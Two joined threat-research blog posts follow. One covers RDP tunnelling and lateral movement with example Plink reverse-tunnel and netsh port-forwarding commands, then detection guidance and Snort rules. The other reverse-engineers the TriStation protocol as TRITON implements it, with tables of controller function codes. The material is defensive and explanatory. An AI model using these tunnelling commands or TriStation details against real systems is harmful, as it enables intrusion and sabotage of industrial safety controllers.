A common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.

Example Plink Executable Command:

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server.


Figure 2: Example of successful RDP tunnel created using Plink


Figure 3: Example of successful port forwarding from the attacker C2 server to the victim

It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility. For example, an attacker’s initial system compromise could have been the result of a payload dropped from a phishing email aimed at establishing a foothold into the environment, while simultaneously extracting credentials to escalate privileges. RDP tunneling into a compromised environment is one of many access methods typically used by attackers to maintain their presence in an environment.

Jump Box Pivoting

Not only is RDP the perfect tool for accessing compromised systems externally, but RDP sessions can also be daisy-chained across multiple systems as a way to move laterally through an environment. FireEye has observed threat actors using the native Windows Network Shell (netsh) command to utilize RDP port forwarding as a way to access newly discovered segmented networks reachable only through an administrative jump box.

Example netsh Port Forwarding Command:

netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport=3389 connectaddress=<DESTINATION IP>

Example Shortened netsh Port Forwarding Command:

netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic being sent from a previously compromised system. The traffic would then be forwarded directly through the jump box to any system on the segmented network using any designated port, including the default RDP port TCP 3389. This type of RDP port forwarding gives threat actors a way to utilize a jump box’s allowed network routes without disrupting legitimate administrators who are using the jump box during an ongoing RDP session. Figure 4 provides an example of RDP lateral movement to a segmented network via an administrative jump box.


Figure 4: Lateral Movement via RDP using a jump box to a segmented network

Prevention and Detection of RDP Tunneling

If RDP is enabled, threat actors have a way to move laterally and maintain presence in the environment through tunneling or port forwarding. To mitigate vulnerability to and detect these types of RDP attacks, organizations should focus on both host-based and network-based prevention and detection mechanisms. For additional information see the FireEye blog post on establishing a baseline for remote desktop protocol.

Host-Based Prevention:

  • Remote Desktop Service: Disable the remote desktop service on all end-user workstations and systems for which the service is not required for remote connectivity.
  • Host-based Firewalls: Enable host-based firewall rules that explicitly deny inbound RDP connections.
  • Local Accounts: Prevent the use of RDP using local accounts on workstations by enabling the “Deny log on through Remote Desktop Services” security setting.

Host-Based Detection:

Registry Keys:

  • Review registry keys associated with Plink connections that can be abused by RDP session tunneling to identify unique source and destination systems. By default, both PuTTY and Plink store session information and previously connected ssh servers in the following registry keys on Windows systems:
    • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
    • HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys
  • Similarly, the creation of a PortProxy configuration with netsh is stored with the following Windows registry key:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
  • Collecting and reviewing these registry keys can identify both legitimate SSH and unexpected tunneling activity. Additional review may be needed to confirm the purpose of each artifact.
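To make that collection step concrete, here is a minimal Python sketch (our own illustration, not FireEye tooling) that dumps these keys on a live host with the standard winreg module; note that netsh portproxy entries typically land under the tcp subkey of the PortProxy path listed above.

import winreg

ARTIFACT_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\SimonTatham\PuTTY\SshHostKeys"),
    # portproxy entries created with netsh typically appear under the tcp subkey
    (winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp"),
]

def dump_values(hive, subkey):
    """Print each value under a registry key, or note that the key is absent."""
    try:
        with winreg.OpenKey(hive, subkey) as key:
            for i in range(winreg.QueryInfoKey(key)[1]):
                name, data, _type = winreg.EnumValue(key, i)
                print(subkey + "\\" + name, "=", data)
    except OSError:
        print(subkey + ": not present")

if __name__ == "__main__":
    for hive, subkey in ARTIFACT_KEYS:
        dump_values(hive, subkey)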

Event Logs:

  • Review event logs for high-fidelity logon events. Common RDP logon events are contained in the following event logs on Windows systems:
    • %systemroot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
    • %systemroot%\System32\winevt\Logs\Security.evtx
  • The “TerminalServices-LocalSessionManager” log contains successful interactive local or remote logon events as identified by EID 21 and successful reconnection of a previously established RDP session not terminated by a proper user logout as identified by EID 25. The “Security” log contains successful Type 10 remote interactive logons (RDP) as identified by EID 4624. A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389.
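As one way to triage these events, the following is a minimal sketch (our own illustration; the field names come from the standard 4624 event text) that shells out to the built-in wevtutil utility and flags Type 10 logons whose source address is a loopback address:

import re
import subprocess

# Pull recent successful logons (EID 4624) from the Security log in text form.
# wevtutil is built into Windows; /c caps the number of events returned.
QUERY = [
    "wevtutil", "qe", "Security",
    "/q:*[System[(EventID=4624)]]",
    "/f:text", "/c:1000", "/rd:true",
]

def tunneled_rdp_candidates():
    """Yield 4624 events that look like RDP logons sourced from localhost."""
    text = subprocess.run(QUERY, capture_output=True, text=True, check=True).stdout
    for event in text.split("Event[")[1:]:
        flat = re.sub(r"\s+", " ", event)
        if "Logon Type: 10" in flat and re.search(r"Source Network Address: 127\.", flat):
            yield flat[:200]

if __name__ == "__main__":
    for candidate in tunneled_rdp_candidates():
        print(candidate)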

Review your artifacts of execution for “plink.exe” file execution. Note that attackers can rename the file name to avoid detection. Relevant artifacts include, but are not limited to:

  • Application Compatibility Cache/Shimcache
  • Amcache
  • Jump Lists
  • Prefetch
  • Service Events
  • CCM Recently Used Apps from the WMI repository
  • Registry keys

Network-Based Prevention:

  • Remote Connectivity: Where RDP is required for connectivity, enforce the connection to be initiated from a designated jump box or centralized management server.
  • Domain Accounts: Employ the “Deny log on through Remote Desktop Services” security setting for privileged accounts (e.g. domain administrators) and service accounts, as these types of accounts are commonly used by threat actors to laterally move to sensitive systems in an environment.

Network-Based Detection:

  • Firewall Rules: Review existing firewall rules to identify areas of vulnerability to port forwarding. In addition to the potential use of port forwarding, monitoring for internal communications between workstations in the environment should be conducted. Generally, workstations do not have a need to communicate with one another directly, and firewall rules can be used to prevent any such communication except where needed.
  • Network Traffic: Perform content inspection of network traffic. Not all traffic communicating on a given port is what it appears to be. For example, threat actors may use TCP ports 80 or 443 to establish an RDP tunnel with a remote server. Deep inspection of the network traffic can likely reveal that it is not actually HTTP or HTTPS but entirely different traffic. Therefore, organizations should closely monitor their network traffic.
  • Snort Rules: The main indicator of tunneled RDP occurs when the RDP handshake has a designated low source port generally used for another protocol. Figure 5 provides two sample Snort rules that can help security teams identify RDP tunneling in their network traffic by identifying designated low source ports generally used for other protocols.

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

Figure 5: Sample Snort Rules to identify RDP tunneling

Conclusion

RDP enables IT environments to offer freedom and interoperability to users. But with more and more threat actors using RDP to move laterally across networks with limited segmentation, security teams are being challenged to decipher between legitimate and malicious RDP traffic. Therefore, adequate host-based and network-based prevention and detection methods should be taken to actively monitor for and be able to identify malicious RDP usage.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies and to answer these types of questions, so we started with a deeper look at TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but is natively implemented through the TriStation 1131 software suite. TriStation operates over UDP port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In TsLow.pyc’s print_last_error function, we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece of the script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get the impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. A field named "unk" shows that the developer either did not know or did not care to identify this value. We suspect it is a constant, but it remains unknown to us.
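
Putting the two unpack operations together, the sketch below shows one way this header could be parsed if dir, cid, cmd and cnt really are single bytes and unk, cks and siz are 16-bit values; the '<BBBBHHH' format string and field widths are our assumption for illustration, not values recovered from TsLow.pyc.

import struct

def parse_packet(packet):
    # tcm_result-style split: bytes 0-3 carry message type and size, the last
    # two bytes are the CRC-16 checksum, and everything in between is the body.
    msg_type, size = struct.unpack('<HH', packet[0:4])
    body = packet[4:-2]
    # Assumed layout for the 10-byte body header (single-byte dir/cid/cmd/cnt,
    # 16-bit unk/cks/siz); illustrative only.
    direction, cid, cmd, cnt, unk, cks, siz = struct.unpack('<BBBBHHH', body[0:10])
    return msg_type, direction, cid, cmd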


Figure 6: Excerpt of the TS_cnames.pyc TS_names array, which contains the TRITON actor's notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend
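
To recap what the TRITON code has told us so far, the following sketch is a small, hypothetical decoder built only from the observations above and the dictionaries reproduced in Appendix A and Appendix B: message type at offset 0, message size at offsets 2 – 3, and (for Execution Command messages) a function code at offset 6. It is our illustration, not a component of TRITON.

import struct

# Small subsets of the TS_cnames.pyc dictionaries (see Appendix A and Appendix B).
TS_MESSAGE_TYPES = {1: 'Connection Request', 2: 'Connection Response',
                    5: 'Execution Command', 6: 'Ping Command'}
TS_FUNCTION_CODES = {20: 'Run program', 21: 'Halt program',
                     55: 'Allocate program', 100: 'Command rejected'}

def describe_tristation(payload):
    if len(payload) < 7:
        return 'too short to be a TriStation message'
    msg_type, size = struct.unpack('<HH', payload[0:4])
    desc = '%s (size %d)' % (
        TS_MESSAGE_TYPES.get(msg_type, 'Unknown message type %d' % msg_type), size)
    if msg_type == 5:
        fc = payload[6]  # function code observed at offset 6
        name = TS_FUNCTION_CODES.get(fc, 'function code %d' % fc)
        # Per the TRITON code, values of 100 and above look like command replies.
        role = 'reply' if fc >= 100 else 'request'
        desc += ' / %s (%s)' % (name, role)
    return desc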

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at the University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation, and unlike TriStation, its structure is described in official documentation. CSL assessed that similarities between the two protocols would exist, and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this were the case we do not believe they had a controller with the exact vulnerable firmware version; otherwise they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from a government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but the developer clearly uses much of the right vernacular and the right acronyms, showing familiarity with PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name: tr1com40.dll
MD5: 069247DF527A96A0E048732CA57E7D3D
Size: 110592 bytes
Compile Date: 2006-08-23
File Description: Tricon Communications Interface
Product Name: TricCom Dynamic Link Library
File Version: 4.2.441
Original File Name: TricCom.DLL
Copyright: Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc appears in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command", and we even see misspelled command strings verbatim, such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname | Compile Date | Reference CPP Strings Code
Lagcom40.dll | 2004/11/19 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Tr1com40.dll | 2006/08/23 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Tridcom.dll | 2008/07/23 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Triccom.dll | 2008/07/23 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Tridcom.dll | 2010/09/29 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Tr1com.dll | 2011/04/27 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Lagcom.dll | 2011/04/27 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Triccom.dll | 2011/04/27 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc) | Tr1com40.dll (2006 CPP)
Go to DOWNLOAD mode | <200>
Not set | <209>
Unk75 | Bad message from module
Unk76 | Bad message type
Unk77 | Bad TMI version number
Unk78 | Module did not respond
Unk79 | Open Connection: Invalid SAP %d
Unk81 | Unsupported message for this TMI version
Unk83 |
Wrong command |

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.
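
For anyone who wants to reproduce this kind of comparison, a simple set difference over the extracted string tables is enough. The sketch below uses invented stand-in lists rather than the real extracted tables.

# Stand-in contents; in practice these come from the extracted CPP string
# tables and from the TS_names array in TS_cnames.pyc.
ts_names = {'Run program', 'Halt program', 'Go to DOWNLOAD mode', 'Unk75'}
tr1com40 = {'Run program', 'Halt program', 'Bad message type', '<200>'}

shared = ts_names & tr1com40
only_in_triton = sorted(ts_names - tr1com40)
only_in_dll = sorted(tr1com40 - ts_names)
print(len(shared), only_in_triton, only_in_dll)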

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation protocol, the threat actors still had an incomplete understanding of it. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in the TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name | MD5 | Description
Tr1com40.dll | 069247df527a96a0e048732ca57e7d3d | Tricon Communications DLL
Data1.cab | e6a3c93a6d433cbaf6f573b6c09d76c4 | Parent of Tr1com40.dll
Trilog v4.1.360R | 13a3b83ba2c4236ca59aba679941c8a5 | RAR Archive of TriLog
TridCom.dll | 5c2ed617fdec4779cb33c89082a43100 | Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward, it would be reasonable to anticipate additional frameworks, like TRITON, designed for use against other SIS controllers and associated technologies. If Triconex was within scope for one threat actor, we may see similar attacker methodologies affecting other dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors, and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.
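
As a toy illustration of baseline deviation, the snippet below learns which TriStation function codes an engineering workstation normally sends and flags anything outside that set; both the baseline and the observed traffic are invented for the example.

from collections import Counter

# Invented data: (source_ip, function_code) pairs that a passive OT sensor
# might extract from TriStation Execution Command traffic.
observed = [('10.0.0.5', 29), ('10.0.0.5', 29), ('10.0.0.5', 19),
            ('10.0.0.5', 55), ('10.0.0.9', 20)]

# Baseline: function codes previously seen from legitimate workstations,
# e.g. 29 'Get MP status', 19 'Get CP status', 8 'Get calendar'.
baseline = {29, 19, 8}

for (src, code), count in Counter(observed).items():
    if code not in baseline:
        print('deviation: %s sent function code %d (%d times)' % (src, code, count))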

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most ICS attacks involve standard IT intrusions, we should come together to invent and improve guidelines for how to monitor the PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we've published much of what we learned about TriStation here on the blog, our work will continue as we study the protocol further.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.


Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0 | Message Type
1 | Connection Request
2 | Connection Response
3 | Disconnect Request
4 | Disconnect Response
5 | Execution Command
6 | Ping Command
7 | Connection Limit Reached
8 | Not Connected
9 | MPS Are Dead
10 | Access Denied
11 | Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6 | TS_cnames String
0 | 0: 'Start download all',
1 | 1: 'Start download change',
2 | 2: 'Update configuration',
3 | 3: 'Upload configuration',
4 | 4: 'Set I/O addresses',
5 | 5: 'Allocate network',
6 | 6: 'Load vector table',
7 | 7: 'Set calendar',
8 | 8: 'Get calendar',
9 | 9: 'Set scan time',
A | 10: 'End download all',
B | 11: 'End download change',
C | 12: 'Cancel download change',
D | 13: 'Attach TRICON',
E | 14: 'Set I/O address limits',
F | 15: 'Configure module',
10 | 16: 'Set multiple point values',
11 | 17: 'Enable all points',
12 | 18: 'Upload vector table',
13 | 19: 'Get CP status ',
14 | 20: 'Run program',
15 | 21: 'Halt program',
16 | 22: 'Pause program',
17 | 23: 'Do single scan',
18 | 24: 'Get chassis status',
19 | 25: 'Get minimum scan time',
1A | 26: 'Set node number',
1B | 27: 'Set I/O point values',
1C | 28: 'Get I/O point values',
1D | 29: 'Get MP status',
1E | 30: 'Set retentive values',
1F | 31: 'Adjust clock calendar',
20 | 32: 'Clear module alarms',
21 | 33: 'Get event log',
22 | 34: 'Set SOE block',
23 | 35: 'Record event log',
24 | 36: 'Get SOE data',
25 | 37: 'Enable OVD',
26 | 38: 'Disable OVD',
27 | 39: 'Enable all OVDs',
28 | 40: 'Disable all OVDs',
29 | 41: 'Process MODBUS',
2A | 42: 'Upload network',
2B | 43: 'Set lable',
2C | 44: 'Configure system variables',
2D | 45: 'Deconfigure module',
2E | 46: 'Get system variables',
2F | 47: 'Get module types',
30 | 48: 'Begin conversion table download',
31 | 49: 'Continue conversion table download',
32 | 50: 'End conversion table download',
33 | 51: 'Get conversion table',
34 | 52: 'Set ICM status',
35 | 53: 'Broadcast SOE data available',
36 | 54: 'Get module versions',
37 | 55: 'Allocate program',
38 | 56: 'Allocate function',
39 | 57: 'Clear retentives',
3A | 58: 'Set initial values',
3B | 59: 'Start TS2 program download',
3C | 60: 'Set TS2 data area',
3D | 61: 'Get TS2 data',
3E | 62: 'Set TS2 data',
3F | 63: 'Set program information',
40 | 64: 'Get program information',
41 | 65: 'Upload program',
42 | 66: 'Upload function',
43 | 67: 'Get point groups',
44 | 68: 'Allocate symbol table',
45 | 69: 'Get I/O address',
46 | 70: 'Resend I/O address',
47 | 71: 'Get program timing',
48 | 72: 'Allocate multiple functions',
49 | 73: 'Get node number',
4A | 74: 'Get symbol table',
4B | 75: 'Unk75',
4C | 76: 'Unk76',
4D | 77: 'Unk77',
4E | 78: 'Unk78',
4F | 79: 'Unk79',
50 | 80: 'Go to DOWNLOAD mode',
51 | 81: 'Unk81',
52 | (no entry)
53 | 83: 'Unk83',
54 - 63 | (no entries)
64 | 100: 'Command rejected',
65 | 101: 'Download all permitted',
66 | 102: 'Download change permitted',
67 | 103: 'Modification accepted',
68 | 104: 'Download cancelled',
69 | 105: 'Program accepted',
6A | 106: 'TRICON attached',
6B | 107: 'I/O addresses set',
6C | 108: 'Get CP status response',
6D | 109: 'Program is running',
6E | 110: 'Program is halted',
6F | 111: 'Program is paused',
70 | 112: 'End of single scan',
71 | 113: 'Get chassis configuration response',
72 | 114: 'Scan period modified',
73 | 115: '<115>',
74 | 116: '<116>',
75 | 117: 'Module configured',
76 | 118: '<118>',
77 | 119: 'Get chassis status response',
78 | 120: 'Vectors response',
79 | 121: 'Get I/O point values response',
7A | 122: 'Calendar changed',
7B | 123: 'Configuration updated',
7C | 124: 'Get minimum scan time response',
7D | 125: '<125>',
7E | 126: 'Node number set',
7F | 127: 'Get MP status response',
80 | 128: 'Retentive values set',
81 | 129: 'SOE block set',
82 | 130: 'Module alarms cleared',
83 | 131: 'Get event log response',
84 | 132: 'Symbol table ccepted',
85 | 133: 'OVD enable accepted',
86 | 134: 'OVD disable accepted',
87 | 135: 'Record event log response',
88 | 136: 'Upload network response',
89 | 137: 'Get SOE data response',
8A | 138: 'Alocate network accepted',
8B | 139: 'Load vector table accepted',
8C | 140: 'Get calendar response',
8D | 141: 'Label set',
8E | 142: 'Get module types response',
8F | 143: 'System variables configured',
90 | 144: 'Module deconfigured',
91 | 145: '<145>',
92 | 146: '<146>',
93 | 147: 'Get conversion table response',
94 | 148: 'ICM print data sent',
95 | 149: 'Set ICM status response',
96 | 150: 'Get system variables response',
97 | 151: 'Get module versions response',
98 | 152: 'Process MODBUS response',
99 | 153: 'Allocate program response',
9A | 154: 'Allocate function response',
9B | 155: 'Clear retentives response',
9C | 156: 'Set initial values response',
9D | 157: 'Set TS2 data area response',
9E | 158: 'Get TS2 data response',
9F | 159: 'Set TS2 data response',
A0 | 160: 'Set program information reponse',
A1 | 161: 'Get program information response',
A2 | 162: 'Upload program response',
A3 | 163: 'Upload function response',
A4 | 164: 'Get point groups response',
A5 | 165: 'Allocate symbol table response',
A6 | 166: 'Program timing response',
A7 | 167: 'Disable points full',
A8 | 168: 'Allocate multiple functions response',
A9 | 169: 'Get node number response',
AA | 170: 'Symbol table response',
AB - C7 | (no entries)
C8 | 200: 'Wrong command',
C9 | 201: 'Load is in progress',
CA | 202: 'Bad clock calendar data',
CB | 203: 'Control program not halted',
CC | 204: 'Control program checksum error',
CD | 205: 'No memory available',
CE | 206: 'Control program not valid',
CF | 207: 'Not loading a control program',
D0 | 208: 'Network is out of range',
D1 | 209: 'Not enough arguments',
D2 | 210: 'A Network is missing',
